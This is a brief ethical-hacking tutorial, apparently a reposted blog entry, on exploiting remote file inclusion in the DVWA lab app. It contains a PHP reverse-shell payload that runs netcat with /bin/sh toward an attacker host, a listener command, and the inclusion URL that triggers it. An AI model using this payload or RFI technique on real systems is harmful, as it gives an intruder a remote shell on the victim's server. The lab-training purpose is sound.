Ethical Hacking - Web Penetration Testing(6)
时间:2020-02-07 23:07:29
收藏:0
阅读:62
REMOTE FILE INCLUSION
- Similar to local file inclusion.
- But allows an attacker to read ANY file from ANY server.
- Execute PHP files from other servers on the current server.
- Store PHP files on other servers as .txt.
Pre-Condition:
Set allow_url_include to On status.
Restart web service
Create a local php file on /var/www/html.
<?php passthru("nc -e /bin/sh 10.0.0.13 8080"); ?>
Execute the NC command to wait for connection.
nc -vv -l -p 8080
Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.
We connect to the target machine successfully.
原文:https://www.cnblogs.com/keepmoving1113/p/12274844.html
评论(0)